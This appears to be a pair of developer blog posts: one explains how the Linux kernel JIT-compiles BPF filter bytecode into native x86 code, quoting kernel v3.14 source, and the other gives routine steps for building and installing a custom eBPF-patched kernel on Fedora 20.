This is nothing new. JIT compilation of bytecode has been around for a long time. I think it is one of those eventual steps taken once an interpreted language decides to optimize bytecode execution speed. Interpreter dispatch can become a bit costly once the size of the filter/code and the execution time increase. With high-frequency packet filtering, we need to save as much time as possible, and a good way is to convert the bytecode to native machine code by Just-In-Time compiling it and then executing the native code from the code cache. For BPF, JIT was first discussed in the BPF+ research paper by Begel et al. in 1999. Along with other optimizations (redundant predicate elimination, peephole optimizations etc.), a JIT assembler for BPF bytecode was also discussed. They showed improvements from 3.5x to 9x in certain cases. I quickly started checking whether the Linux kernel had done something similar. And behold, here is what the JIT looks like for the 'add' instruction we discussed before (Linux kernel v3.14):

288                switch (filter[i].code) {
289                case BPF_S_ALU_ADD_X: /* A += X; */
290                        seen |= SEEN_XREG;
291                        EMIT2(0x01, 0xd8);              /* add %ebx,%eax */
292                        break;
293                case BPF_S_ALU_ADD_K: /* A += K; */
294                        if (!K)
295                                break;
296                        if (is_imm8(K))
297                                EMIT3(0x83, 0xc0, K);   /* add imm8,%eax */
298                        else
299                                EMIT1_off32(0x05, K);   /* add imm32,%eax */
300                        break;

As seen above in arch/x86/net/bpf_jit_comp.c for v3.14, instead of performing the operations directly during code dispatch, the JIT compiler emits the native code to a memory area and keeps it ready for execution. The JITed filter image is built like a function, so a prologue and an epilogue are added to it as well:

/* JIT image prologue */
221                EMIT4(0x55, 0x48, 0x89, 0xe5); /* push %rbp; mov %rsp,%rbp */
222                EMIT4(0x48, 0x83, 0xec, 96);    /* subq  $96,%rsp       */

There are rules in BPF (such as no loops, etc.) which the verifier checks before the image is built, as we are now in the dangerous waters of executing externally supplied machine code inside the Linux kernel. In those days, all this was done by bpf_jit_compile(), which upon completion would point the filter function to the filter image:

774                 fp->bpf_func = (void *)image;

Smooooooth… When the filter function is executed, instead of being interpreted, the filter will now run as native code. Even though things have changed a bit recently, this has indeed been a fun way to learn how interpreters and JIT compilers work in general and the kinds of optimizations that can be done. In the next part of this post series, I will look into the changes that have been made recently – the restructuring and extension efforts to BPF and its evolution to eBPF, along with BPF maps and the very recent and ongoing efforts on hist-triggers. I will also discuss my experimental userspace eBPF library, its use for LTTng's UST event filtering and its comparison to LTTng's bytecode interpreter. Brendan's blog post is highly recommended, and so are the links under 'More Reading' in that post.

Thanks to Alexei Starovoitov, Eric Dumazet and all the other kernel contributors to BPF that I may have missed. They are doing awesome work and are the direct source of my learning as well. Looking at the versatility of eBPF, its adoption in newer tools like shark, and Brendan's views and first experiments, it seems this may indeed be the next big thing in tracing.

Custom Kernel on Fedora 20

I recently started experimenting with the eBPF patches by Alexei Starovoitov, which are apparently extending and restructuring the Berkeley Packet Filter infrastructure in the kernel. BPF is used for a lot of tasks like syscall filtering, packet filtering etc. and obviously deserves a separate and grand blog entry. Well, we'll see what can be done about that later, but for now I'll just explain how to do the trivial task of installing a custom kernel (possibly patched/upstream) on your Fedora machine. It's nothing grand, just those familiar textbook tasks. I am using the master from Alexei's repo.

Build the kernel

git clone https://kernel.googlesource.com/pub/scm/linux/kernel/git/ast/bpf
cd bpf

I changed the EXTRAVERSION string in the Makefile just to differentiate it as I may have to use multiple versions while testing.

make menuconfig
make -j4

Set it up

sudo make modules_install
sudo cp arch/x86_64/boot/bzImage "/boot/vmlinuz-"`make kernelrelease`
sudo cp System.map "/boot/System.map-"`make kernelrelease`
sudo dracut "" `make kernelrelease`
sudo grub2-mkconfig -o /boot/grub2/grub.cfg

Restart your machine and enjoy the new kernel. Once you are done with the experiments, boot into the old kernel and remove the initrd, kernel image and the custom system map. Then update the grub config once more. That's it! I'll post more about my experiments with eBPF soon.

References

[1] http://fedoraproject.org/wiki/BuildingUpstreamKernel
[2] http://broken.build/2012/02/12/custom-kernel-on-fedora